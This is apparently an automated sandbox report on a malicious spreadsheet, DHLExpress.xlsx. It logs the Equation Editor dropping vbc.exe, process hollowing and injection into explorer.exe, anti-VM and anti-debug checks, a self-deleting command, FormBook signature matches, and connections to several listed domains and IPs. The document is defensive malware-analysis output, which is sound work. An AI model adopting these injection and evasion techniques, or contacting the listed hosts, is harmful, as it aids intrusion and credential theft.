Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3DF6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile,		7_2_4A3DF6CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3D18A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess,		7_2_4A3D18A6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CC48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose,		7_2_4A3CC48A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CC52D NtQueryInformationToken,		7_2_4A3CC52D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E00C4 NtCreateFile,LdrInitializeThunk,		7_2_023E00C4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E07AC NtCreateMutant,LdrInitializeThunk,		7_2_023E07AC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_023DFAE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_023DFB68
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFB50 NtCreateKey,LdrInitializeThunk,		7_2_023DFB50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_023DFBB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DF900 NtReadFile,LdrInitializeThunk,		7_2_023DF900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DF9F0 NtClose,LdrInitializeThunk,		7_2_023DF9F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_023DFED0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFFB4 NtCreateSection,LdrInitializeThunk,		7_2_023DFFB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_023DFC60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFD8C NtDelayExecution,LdrInitializeThunk,		7_2_023DFD8C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_023DFDC0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E0078 NtResumeThread,		7_2_023E0078
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E0060 NtQuerySection,		7_2_023E0060
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E0048 NtProtectVirtualMemory,		7_2_023E0048
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E10D0 NtOpenProcessToken,		7_2_023E10D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E010C NtOpenDirectoryObject,		7_2_023E010C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E1148 NtOpenThread,		7_2_023E1148
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E01D4 NtSetValueKey,		7_2_023E01D4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFA20 NtQueryInformationFile,		7_2_023DFA20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFA50 NtEnumerateValueKey,		7_2_023DFA50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFAB8 NtQueryValueKey,		7_2_023DFAB8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFAD0 NtAllocateVirtualMemory,		7_2_023DFAD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DFBE8 NtQueryVirtualMemory,		7_2_023DFBE8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DF8CC NtWaitForSingleObject,		7_2_023DF8CC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023DF938 NtWriteFile,		7_2_023DF938
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023E1930 NtSetContextThread,		7_2_023E1930

Contains functionality to communicate with device drivers

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A3CA902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,

7_2_4A3CA902

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Sample is known by Antivirus

Source: DHLExpress.xlsx

ReversingLabs: Detection: 32%

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DHLExpress.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE030.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/22@6/6

Contains functionality to instantiate COM classes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,

4_2_00402012

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Contains functionality to check free disk space

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_00404275

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.468159322.0000000000590000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505533328.00000000008A0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.466750651.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.505403506.0000000000720000.00000040.00000001.sdmp, cmd.exe
Source:	Binary string: cmd.pdb,$>J6$>J@$>J source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: vbc.exe, 00000005.00000002.505732273.0000000002410000.00000040.00020000.sdmp, vbc.exe, 00000005.00000003.504155697.000000000028C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.504182162.00000000002CA000.00000004.00000001.sdmp, cmd.exe

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_73231000 push eax; ret		4_2_7323102E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041504B push ds; iretd		5_2_0041504C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B822 push eax; ret		5_2_0041B828
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B82B push eax; ret		5_2_0041B892
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B88C push eax; ret		5_2_0041B892
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00416239 push esi; retf		5_2_0041623B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415AE6 push ecx; retf		5_2_00415B02
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415AF0 push ecx; retf		5_2_00415B02
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004162A9 push esi; retf		5_2_0041623B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415401 push cs; retf		5_2_00415405
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BCFD push dword ptr [4E2C34C0h]; ret		5_2_0041C058
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7D5 push eax; ret		5_2_0041B828
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C13B6 push ecx; ret		7_2_4A3C13C9

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405DA3

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsuBDB6.tmp\vdobpgi.dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000000C8604 second address: 00000000000C860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000000C899E second address: 00000000000C89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2832	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 2984	Thread sleep time: -32000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088D0 rdtsc

5_2_004088D0

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 0.9 %

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7C FindFirstFileA,FindClose,		4_2_00405D7C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_004053AA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402630 FindFirstFileA,		4_2_00402630
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3E0202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,		7_2_4A3E0202
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C2E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,		7_2_4A3C2E73
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C6E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,		7_2_4A3C6E47
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3DBF0C FindFirstFileW,FindNextFileW,FindClose,		7_2_4A3DBF0C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3CBBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,		7_2_4A3CBBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3E0492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,		7_2_4A3E0492

Program exit points

Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.484933036.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.484933036.000000000457A000.00000004.00000001.sdmp	Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________D
Source: explorer.exe, 00000006.00000000.484933036.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.466928021.0000000000324000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.484790298.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.469642835.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.536470326.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405DA3

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A3C727F GetProcessHeap,HeapFree,

7_2_4A3C727F

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088D0 rdtsc

5_2_004088D0

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0018EADA mov eax, dword ptr fs:[00000030h]		4_2_0018EADA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0018EC08 mov eax, dword ptr fs:[00000030h]		4_2_0018EC08
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0018EBCA mov eax, dword ptr fs:[00000030h]		4_2_0018EBCA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0018EB8B mov eax, dword ptr fs:[00000030h]		4_2_0018EB8B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0018E8C6 mov eax, dword ptr fs:[00000030h]		4_2_0018E8C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]		5_2_007426F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_023F26F8 mov eax, dword ptr fs:[00000030h]		7_2_023F26F8

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B40 LdrLoadDll,

5_2_00409B40

Contains functionality to register its own exception handler

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C13A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_4A3C13A9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 7_2_4A3C7C63 SetUnhandledExceptionFilter,		7_2_4A3C7C63

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 172.67.178.13 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.chiplorain.com
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.louisesshop.com
Source: C:\Windows\explorer.exe	Domain query: www.atlantahousingsolutions.com
Source: C:\Windows\explorer.exe	Domain query: www.searakloset.com
Source: C:\Windows\explorer.exe	Domain query: www.lauraimoveis.com
Source: C:\Windows\explorer.exe	Network Connect: 156.67.74.112 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.207.77 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A3C0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.469837109.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.534448161.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.534240186.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469616114.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.469837109.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.534448161.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.469837109.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.534448161.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,		7_2_4A3D270D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,memmove,GetLocaleInfoW,GetTimeFormatW,		7_2_4A3CD701
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,		7_2_4A3C88D9

Contains functionality to query local / system time

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A3D4E44 GetSystemTime,SystemTimeToFileTime,

7_2_4A3D4E44

Contains functionality to query windows version

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

4_2_00405AA7

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670422841.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670529707.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505237458.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.670482603.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505715407.00000000023E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.467163714.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.505257053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.496333935.0000000009552000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.466568684.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465993067.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.465344167.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.487305412.0000000009552000.00000040.00020000.sdmp, type: MEMORY
